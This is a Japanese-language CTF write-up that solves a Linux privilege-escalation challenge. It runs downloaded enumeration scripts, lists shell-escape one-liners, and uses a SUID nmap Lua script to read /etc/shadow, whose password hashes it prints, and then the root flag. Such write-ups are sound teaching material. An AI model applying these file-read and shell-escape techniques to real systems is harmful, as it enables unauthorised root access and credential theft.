CSA CTF 2019 Writeup - Linux 2
Question
ssh user@35.231.176.102 -p1774 Password: utsacyber
Solution
user@7ab7e9c7f6a4:~$ ll total 32 drwxr-xr-x 1 user user 4096 Apr 27 14:35 ./ drwxr-xr-x 1 root root 4096 Apr 22 20:12 ../ -rw-r--r-- 1 user user 220 Aug 31 2015 .bash_logout -rw-r--r-- 1 user user 3771 Aug 31 2015 .bashrc drwx------ 2 user user 4096 Apr 27 14:35 .cache/ -rw-r--r-- 1 user user 655 May 16 2017 .profile -rw-rw-r-- 1 root root 10 Apr 22 20:56 readme.txt user@7ab7e9c7f6a4:~$ cat readme.txt Get root.
Privilege Escalationする問題のようだ。
linuxprivcheckerとLinEnumを使用して、攻略の糸口を調査する。
linuxprivchecker
user@7ab7e9c7f6a4:~$ cd /tmp/ user@7ab7e9c7f6a4:/tmp$ wget https://www.securitysift.com/download/linuxprivchecker.py --2019-04-27 14:39:10-- https://www.securitysift.com/download/linuxprivchecker.py Resolving www.securitysift.com (www.securitysift.com)... 173.254.14.183 Connecting to www.securitysift.com (www.securitysift.com)|173.254.14.183|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 25304 (25K) [application/octet-stream] Saving to: 'linuxprivchecker.py' linuxprivchecker.py 100%[=====================================>] 24.71K --.-KB/s in 0s 2019-04-27 14:39:10 (54.0 MB/s) - 'linuxprivchecker.py' saved [25304/25304] user@7ab7e9c7f6a4:/tmp$ python linuxprivchecker.py ================================================================================================= LINUX PRIVILEGE ESCALATION CHECKER ================================================================================================= [*] GETTING BASIC SYSTEM INFO... [+] Kernel Linux version 4.15.0-1029-gcp (buildd@lcy01-amd64-029) (gcc version 7.3.0 (Ubuntu 7.3.0-16ubuntu3)) #31-Ubuntu SMP Thu Mar 21 09:40:28 UTC 2019 [+] Hostname 7ab7e9c7f6a4 [+] Operating System Ubuntu 16.04.6 LTS \n \l (snip) [+] SUID/SGID Files and Directories -rwxr-sr-x 1 root shadow 35632 Apr 9 2018 /sbin/pam_extrausers_chkpwd -rwxr-sr-x 1 root shadow 35600 Apr 9 2018 /sbin/unix_chkpwd -rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su -rwsr-xr-x 1 root root 40152 May 16 2018 /bin/mount -rwsr-xr-x 1 root root 27608 May 16 2018 /bin/umount -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6 -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping drwxrwsr-x 7 root staff 4096 Apr 22 20:12 /usr/local/share/sgml drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/sgml/declaration drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/sgml/misc drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/sgml/stylesheet drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/sgml/dtd drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/sgml/entities drwxrwsr-x 6 root staff 4096 Apr 22 20:12 /usr/local/share/xml drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/xml/declaration drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/xml/misc drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/xml/schema drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/xml/entities drwxrwsr-x 3 root staff 4096 Apr 22 20:12 /usr/local/lib/python3.5 drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/lib/python3.5/dist-packages drwxrwsr-x 4 root staff 4096 Apr 22 20:12 /usr/local/lib/python2.7 drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/lib/python2.7/dist-packages drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/lib/python2.7/site-packages -rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn -rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd -rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh -rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp -rwxr-sr-x 1 root shadow 62336 May 16 2017 /usr/bin/chage -rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd -rwxr-sr-x 1 root tty 27368 May 16 2018 /usr/bin/wall -rwxr-sr-x 1 root shadow 22768 May 16 2017 /usr/bin/expiry -rwsr-xr-x 1 root root 2770528 Mar 31 2016 /usr/bin/nmap -rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo -rwxr-sr-x 1 root ssh 358624 Mar 4 14:09 /usr/bin/ssh-agent -rwsr-xr-x 1 root root 428240 Mar 4 14:09 /usr/lib/openssh/ssh-keysign drwxrwsr-x 2 root staff 4096 Apr 12 2016 /var/local drwxrwsr-x 2 root mail 4096 Feb 22 10:05 /var/mail (snip) [+] Installed Tools /usr/bin/awk /usr/bin/perl /usr/bin/python /usr/bin/vi /usr/bin/vim /usr/bin/nmap /usr/bin/find /bin/netcat /bin/nc /usr/bin/wget [+] Related Shell Escape Sequences... nmap--> --interactive vi--> :!bash vi--> :set shell=/bin/bash:shell vi--> :!bash vi--> :set shell=/bin/bash:shell awk--> awk 'BEGIN {system("/bin/bash")}' find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \; perl--> perl -e 'exec "/bin/bash";' [*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS... Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested! The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system The following exploits are applicable to this kernel version and should be investigated as well - Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c - Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby** - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c - CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c - open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c Finished =================================================================================================
LinEnum
user@7ab7e9c7f6a4:/tmp$ wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh --2019-04-27 14:40:28-- https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ... Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 45639 (45K) [text/plain] Saving to: 'LinEnum.sh' LinEnum.sh 100%[==============================================================================================>] 44.57K --.-KB/s in 0.02s 2019-04-27 14:40:28 (1.84 MB/s) - 'LinEnum.sh' saved [45639/45639] user@7ab7e9c7f6a4:/tmp$ chmod 777 ./LinEnum.sh user@7ab7e9c7f6a4:/tmp$ ./LinEnum.sh ######################################################### # Local Linux Enumeration & Privilege Escalation Script # ######################################################### # www.rebootuser.com # version 0.96 [-] Debug Info [+] Thorough tests = Disabled Scan started at: Sat Apr 27 14:41:02 UTC 2019 (snip) ### INTERESTING FILES #################################### [-] Useful file locations: /bin/nc /bin/netcat /usr/bin/wget /usr/bin/nmap /usr/bin/curl [-] Can we read/write sensitive files: -rw-r--r-- 1 root root 1328 Apr 22 20:12 /etc/passwd -rw-r--r-- 1 root root 602 Apr 22 20:12 /etc/group -rw-r--r-- 1 root root 575 Oct 22 2015 /etc/profile -rw-r----- 1 root shadow 898 Apr 22 20:12 /etc/shadow [-] SUID files: -rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su -rwsr-xr-x 1 root root 40152 May 16 2018 /bin/mount -rwsr-xr-x 1 root root 27608 May 16 2018 /bin/umount -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6 -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping -rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn -rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd -rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh -rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp -rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd -rwsr-xr-x 1 root root 2770528 Mar 31 2016 /usr/bin/nmap -rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo -rwsr-xr-x 1 root root 428240 Mar 4 14:09 /usr/lib/openssh/ssh-keysign [+] Possibly interesting SUID files: -rwsr-xr-x 1 root root 2770528 Mar 31 2016 /usr/bin/nmap (snip) ### SCAN COMPLETE ####################################
nmap
がインストールされており、SUIDビットが立っていることがわかる。
しばらくWebを調査すると、以下の記事を発見する。
nmapの--scriptオプションが使用できそうだ。
上記の記事を試してみるが、そのままではShellの取得はできなかった。何かもう一工夫が必要なのだろうか。
ただ、File readの手順(を少し修正して)で、/etc/shadow
ファイルの読み込みはできた。
user@7ab7e9c7f6a4:/tmp$ TF=$(mktemp) user@7ab7e9c7f6a4:/tmp$ echo 'f=io.open("/etc/shadow", "rb"); print(f:read("*a")); io.close(f);' > $TF user@7ab7e9c7f6a4:/tmp$ nmap --script=$TF Starting Nmap 7.01 ( https://nmap.org ) at 2019-04-27 14:43 UTC WARNING: Running Nmap setuid, as you are doing, is a major security risk. NSE: Warning: Loading '/tmp/tmp.Sr3NS1BmQI' -- the recommended file extension is '.nse'. root:$6$i09NKN3z$3ubpJ2G77IKDzS5KKfYjGx3p4MM7ISlhKmDD/.4oJ8Yf88CkRnJVoqdS4BMh8Vae/fQg3.Rjvcbxb4IHgmAqn0:18008:0:99999:7::: daemon:*:17949:0:99999:7::: bin:*:17949:0:99999:7::: sys:*:17949:0:99999:7::: sync:*:17949:0:99999:7::: games:*:17949:0:99999:7::: man:*:17949:0:99999:7::: lp:*:17949:0:99999:7::: mail:*:17949:0:99999:7::: news:*:17949:0:99999:7::: uucp:*:17949:0:99999:7::: proxy:*:17949:0:99999:7::: www-data:*:17949:0:99999:7::: backup:*:17949:0:99999:7::: list:*:17949:0:99999:7::: irc:*:17949:0:99999:7::: gnats:*:17949:0:99999:7::: nobody:*:17949:0:99999:7::: systemd-timesync:*:17949:0:99999:7::: systemd-network:*:17949:0:99999:7::: systemd-resolve:*:17949:0:99999:7::: systemd-bus-proxy:*:17949:0:99999:7::: _apt:*:17949:0:99999:7::: sshd:*:18008:0:99999:7::: user:$6$xReGWCgk$2OD/Q2jXewLgbryfcZZugNCic/xBt.BKkbk5dB6BcRQmNdw.yw6PC1S8N40Tm7WymaTh4K927hFGUJ9aoSm/1.:18008:0:99999:7::: NSE: failed to initialize the script engine: /usr/bin/../share/nmap/nse_main.lua:607: /tmp/tmp.Sr3NS1BmQI is missing required field: 'action' stack traceback: [C]: in function 'error' /usr/bin/../share/nmap/nse_main.lua:607: in function 'new' /usr/bin/../share/nmap/nse_main.lua:805: in function 'get_chosen_scripts' /usr/bin/../share/nmap/nse_main.lua:1249: in main chunk [C]: in ? QUITTING!
1つ前の問題のフラグがflag.txtファイルにあったこと、README.txtにGet root.
と書かれていたことから、
/root/flag.txt
がフラグファイルの場所と推測する。
user@7ab7e9c7f6a4:/tmp$ echo 'f=io.open("/root/flag.txt", "rb"); print(f:read("*a")); io.close(f);' > $TF user@7ab7e9c7f6a4:/tmp$ nmap --script=$TF Starting Nmap 7.01 ( https://nmap.org ) at 2019-04-27 14:44 UTC WARNING: Running Nmap setuid, as you are doing, is a major security risk. NSE: Warning: Loading '/tmp/tmp.Sr3NS1BmQI' -- the recommended file extension is '.nse'. CSACTF{sh3_d0esnt_3v3n_g0_h3r3} NSE: failed to initialize the script engine: /usr/bin/../share/nmap/nse_main.lua:607: /tmp/tmp.Sr3NS1BmQI is missing required field: 'action' stack traceback: [C]: in function 'error' /usr/bin/../share/nmap/nse_main.lua:607: in function 'new' /usr/bin/../share/nmap/nse_main.lua:805: in function 'get_chosen_scripts' /usr/bin/../share/nmap/nse_main.lua:1249: in main chunk [C]: in ? QUITTING!
フラグゲット。
CSACTF{sh3_d0esnt_3v3n_g0_h3r3}